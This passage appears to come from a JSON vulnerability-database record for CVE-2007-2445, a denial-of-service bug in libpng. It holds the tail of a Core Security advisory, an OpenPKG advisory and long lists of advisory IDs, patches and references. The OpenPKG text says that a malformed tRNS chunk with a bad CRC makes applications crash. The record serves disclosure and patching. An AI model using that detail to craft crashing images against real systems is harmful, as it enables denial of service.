26th,\n2008\nhttp://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html\n[6] The Shellcoder\u0027s Handbook: Discovering and Exploiting Security Holes\nby Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. \nWiley; 2nd edition (August 20, 2007) -\nhttp://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html\n[7] Graphics Interchange Format version 89a -\nhttp://www.w3.org/Graphics/GIF/spec-gif89a.txt\n[8] Android downloads page http://code.google.com/p/android/downloads/list\n[9] Portable Network Graphics (PNG) specification -\nhttp://www.w3.org/TR/PNG/\n[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html\n\n\n*About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs/. \n\n\n*About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company\u0027s flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com. \n\n\n*Disclaimer*\n\nThe contents of this advisory are copyright (c) 2008 Core Security\nTechnologies and (c) 2008 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given. \n\n\n*GPG/PGP Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I\nteV3ahcSAUFEtsaRCeXVuN8=\n=u35s\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n____________________________________________________________________________\n\nPublisher Name: OpenPKG GmbH\nPublisher Home: http://openpkg.com/\n\nAdvisory Id (public): OpenPKG-SA-2007.013\nAdvisory Type: OpenPKG Security Advisory (SA)\nAdvisory Directory: http://openpkg.com/go/OpenPKG-SA\nAdvisory Document: http://openpkg.com/go/OpenPKG-SA-2007.013\nAdvisory Published: 2007-05-17 22:31 UTC\n\nIssue Id (internal): OpenPKG-SI-20070517.02\nIssue First Created: 2007-05-17\nIssue Last Modified: 2007-05-17\nIssue Revision: 03\n____________________________________________________________________________\n\nSubject Name: png\nSubject Summary: Portable Network Graphics (PNG) Image Format\n Library\nSubject Home: http://www.libpng.org/pub/png/libpng.html\nSubject Versions: * \u003c= 1.2.16\n\nVulnerability Id: CVE-2007-2445\nVulnerability Scope: global (not OpenPKG specific)\n\nAttack Feasibility: run-time\nAttack Vector: remote network\nAttack Impact: denial of service\n\nDescription:\n As confirmed by the vendor, a Denial of Service (DoS) vulnerability\n exists in the PNG [0] image format library libpng [1]. The bug is\n a NULL-pointer-dereference vulnerability involving palette images\n with a malformed \"tRNS\" PNG chunk, i.e., one with a bad CRC value. \n This bug can, at a minimum, cause crashes in applications simply by\n displaying a malformed image. \n\nReferences:\n [0] http://www.libpng.org/pub/png/\n [1] http://www.libpng.org/pub/png/libpng.html\n [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445\n____________________________________________________________________________\n\nPrimary Package Name: png\nPrimary Package Home: http://openpkg.org/go/package/png\n\nCorrected Distribution: Corrected Branch: Corrected Package:\nOpenPKG Enterprise E1.0-SOLID ghostscript-8.54-E1.0.1\nOpenPKG Enterprise E1.0-SOLID png-1.2.12-E1.0.2\nOpenPKG Community CURRENT ghostscript-8.57-20070516\nOpenPKG Community CURRENT png-1.2.18-20070516\n____________________________________________________________________________\n\nFor security reasons, this document was digitally signed with the\nOpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34)\nwhich you can download from http://openpkg.com/openpkg.com.pgp\nor retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. \nFollow the instructions at http://openpkg.com/security/signatures/\nfor more details on how to verify the integrity of this document",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2445"
},
{
"db": "CERT/CC",
"id": "VU#684664"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000397"
},
{
"db": "BID",
"id": "24000"
},
{
"db": "BID",
"id": "24023"
},
{
"db": "PACKETSTORM",
"id": "68410"
},
{
"db": "PACKETSTORM",
"id": "75976"
},
{
"db": "PACKETSTORM",
"id": "57069"
},
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "57151"
},
{
"db": "PACKETSTORM",
"id": "64260"
},
{
"db": "PACKETSTORM",
"id": "56849"
}
],
"trust": 3.51
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2007-2445",
"trust": 3.7
},
{
"db": "CERT/CC",
"id": "VU#684664",
"trust": 3.5
},
{
"db": "SECUNIA",
"id": "25292",
"trust": 3.2
},
{
"db": "BID",
"id": "24000",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "25742",
"trust": 2.4
},
{
"db": "SECUNIA",
"id": "25353",
"trust": 2.4
},
{
"db": "SECTRACK",
"id": "1018078",
"trust": 2.4
},
{
"db": "BID",
"id": "24023",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "25571",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25787",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25329",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25461",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "34388",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25268",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "30161",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "27056",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "29420",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25554",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "31168",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25273",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25867",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-1838",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2385",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2008-0924",
"trust": 1.6
},
{
"db": "XF",
"id": "34340",
"trust": 1.4
},
{
"db": "OSVDB",
"id": "36196",
"trust": 1.0
},
{
"db": "USCERT",
"id": "TA08-079A",
"trust": 0.8
},
{
"db": "USCERT",
"id": "SA08-079A",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000397",
"trust": 0.8
},
{
"db": "UBUNTU",
"id": "USN-472-1",
"trust": 0.6
},
{
"db": "GENTOO",
"id": "GLSA-200705-24",
"trust": 0.6
},
{
"db": "GENTOO",
"id": "GLSA-200805-07",
"trust": 0.6
},
{
"db": "SUNALERT",
"id": "102987",
"trust": 0.6
},
{
"db": "SUNALERT",
"id": "200871",
"trust": 0.6
},
{
"db": "MANDRIVA",
"id": "MDKSA-2007:116",
"trust": 0.6
},
{
"db": "OPENPKG",
"id": "OPENPKG-SA-2007.013",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-1613",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-1750",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2007:0356",
"trust": 0.6
},
{
"db": "APPLE",
"id": "APPLE-SA-2008-03-18",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20070517 FLEA-2007-0018-1: LIBPNG",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080304 CORE-2008-0124: MULTIPLE VULNERABILITIES IN GOOGLE\u0027S ANDROID SDK",
"trust": 0.6
},
{
"db": "SLACKWARE",
"id": "SSA:2007-136-01",
"trust": 0.6
},
{
"db": "SUSE",
"id": "SUSE-SR:2007:013",
"trust": 0.6
},
{
"db": "TRUSTIX",
"id": "2007-0019",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "68410",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "75976",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57069",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "129524",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57151",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "64260",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "56849",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#684664"
},
{
"db": "BID",
"id": "24000"
},
{
"db": "BID",
"id": "24023"
},
{
"db": "PACKETSTORM",
"id": "68410"
},
{
"db": "PACKETSTORM",
"id": "75976"
},
{
"db": "PACKETSTORM",
"id": "57069"
},
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "57151"
},
{
"db": "PACKETSTORM",
"id": "64260"
},
{
"db": "PACKETSTORM",
"id": "56849"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000397"
},
{
"db": "NVD",
"id": "CVE-2007-2445"
}
]
},
"id": "VAR-200705-0670",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.96590906
},
"last_update_date": "2026-03-09T20:54:39.541000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Security Update 2008-002",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT1249"
},
{
"title": "Security Update 2008-002",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT1249?viewlocale=ja_JP"
},
{
"title": "ImageKit6 FixNo.44",
"trust": 0.8,
"url": "http://www.imagekit.com/support/eng-sunewik6.html"
},
{
"title": "ImageKit7 ActiveX: Update Log FixNo.2",
"trust": 0.8,
"url": "http://www.imagekit.com/support/eng-sunewik7ax.html"
},
{
"title": "ImageKit6 Lite: Update Log FixNo.31",
"trust": 0.8,
"url": "http://www.imagekit.com/support/eng-sunewik6L.html"
},
{
"title": "15 May 2007",
"trust": 0.8,
"url": "http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/l/li/libpng/libpng-1.2.17-ADVISORY.txt"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.libpng.org/"
},
{
"title": "1023",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1023"
},
{
"title": "1511",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1511"
},
{
"title": "NV07-005",
"trust": 0.8,
"url": "http://www.nec.co.jp/security-info/secinfo/nv07-005.html"
},
{
"title": "RHSA-2007:0356",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/RHSA-2007-0356.html"
},
{
"title": "200871",
"trust": 0.8,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-200871-1"
},
{
"title": "TLSA-2007-45",
"trust": 0.8,
"url": "http://www.turbolinux.com/security/2007/TLSA-2007-45.txt"
},
{
"title": "RHSA-2007:0356",
"trust": 0.8,
"url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2007-0356J.html"
},
{
"title": "ImageKit6 VCL",
"trust": 0.8,
"url": "http://www.newtone.co.jp/supportik6V.html"
},
{
"title": "ImageKit6",
"trust": 0.8,
"url": "http://www.newtone.co.jp/supportik6.html"
},
{
"title": "PostKit2",
"trust": 0.8,
"url": "http://www.newtone.co.jp/supportpk2.html"
},
{
"title": "ImageKit7 ActiveX",
"trust": 0.8,
"url": "http://www.newtone.co.jp/supportik7AX.html"
},
{
"title": "TLSA-2007-45",
"trust": 0.8,
"url": "http://www.turbolinux.co.jp/security/2007/TLSA-2007-45j.txt"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-000397"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2445"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.0,
"url": "http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/l/li/libpng/libpng-1.2.17-advisory.txt"
},
{
"trust": 2.7,
"url": "http://www.kb.cert.org/vuls/id/684664"
},
{
"trust": 2.4,
"url": "http://www.securitytracker.com/id?1018078"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/24000"
},
{
"trust": 1.9,
"url": "http://support.avaya.com/elmodocs2/security/asa-2007-254.htm"
},
{
"trust": 1.9,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-200871-1"
},
{
"trust": 1.9,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102987-1"
},
{
"trust": 1.7,
"url": "http://www.coresecurity.com/?action=item\u0026id=2148"
},
{
"trust": 1.7,
"url": "http://openpkg.com/go/openpkg-sa-2007.013"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25292/"
},
{
"trust": 1.6,
"url": "http://sourceforge.net/project/shownotes.php?release_id=508656\u0026group_id=5624"
},
{
"trust": 1.6,
"url": "http://sourceforge.net/project/shownotes.php?release_id=508653\u0026group_id=5624"
},
{
"trust": 1.6,
"url": "https://issues.rpath.com/browse/rpl-1381"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24023"
},
{
"trust": 1.6,
"url": "http://www.redhat.com/support/errata/rhsa-2007-0356.html"
},
{
"trust": 1.6,
"url": "http://www.debian.org/security/2009/dsa-1750"
},
{
"trust": 1.6,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2007\u0026m=slackware-security.492650"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/34388"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25329"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25292"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25273"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25268"
},
{
"trust": 1.6,
"url": "http://www.ubuntu.com/usn/usn-472-1"
},
{
"trust": 1.6,
"url": "http://www.trustix.org/errata/2007/0019/"
},
{
"trust": 1.6,
"url": "http://www.novell.com/linux/security/advisories/2007_13_sr.html"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2007:116"
},
{
"trust": 1.6,
"url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
},
{
"trust": 1.6,
"url": "http://www.gentoo.org/security/en/glsa/glsa-200705-24.xml"
},
{
"trust": 1.6,
"url": "http://www.debian.org/security/2008/dsa-1613"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/31168"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/30161"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/29420"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/27056"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25867"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25787"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25742"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25571"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25554"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25461"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25353"
},
{
"trust": 1.6,
"url": "http://lists.apple.com/archives/security-announce/2008/mar/msg00001.html"
},
{
"trust": 1.6,
"url": "http://irrlicht.sourceforge.net/changes.txt"
},
{
"trust": 1.6,
"url": "http://docs.info.apple.com/article.html?artnum=307562"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/34340"
},
{
"trust": 1.4,
"url": "http://www.frsirt.com/english/advisories/2007/1838"
},
{
"trust": 1.0,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2445"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/1838"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/468910/100/0/threaded"
},
{
"trust": 1.0,
"url": "http://osvdb.org/36196"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/489135/100/0/threaded"
},
{
"trust": 1.0,
"url": "http://android-developers.blogspot.com/2008/03/android-sdk-update-m5-rc15-released.html"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34340"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2008/0924/references"
},
{
"trust": 1.0,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10094"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2385"
},
{
"trust": 0.8,
"url": "http://sourceforge.net/project/showfiles.php?group_id=5624"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/25353/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/25742/"
},
{
"trust": 0.8,
"url": "http://www.jpcert.or.jp/wr/2007/wr071901.txt"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu%23684664/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta08-079a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta08-079a/index.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-2445"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/alerts/sa08-079a.html"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/techalerts/ta08-079a.html"
},
{
"trust": 0.7,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2445"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/468910/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/489135/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2008/0924/references"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2385"
},
{
"trust": 0.3,
"url": "http://irrlicht.sourceforge.net"
},
{
"trust": 0.3,
"url": "/archive/1/491868"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2007-0356.html"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5269"
},
{
"trust": 0.2,
"url": "http://www.debian.org/security/faq"
},
{
"trust": 0.2,
"url": "http://packages.debian.org/\u003cpkg\u003e"
},
{
"trust": 0.2,
"url": "http://security.debian.org/"
},
{
"trust": 0.2,
"url": "http://www.debian.org/security/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5266"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5268"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33-5.2etch1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_mips.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3476"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3477"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33-5.2etch1.dsc"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_alpha.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3996"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb"
},
{
"trust": 0.1,
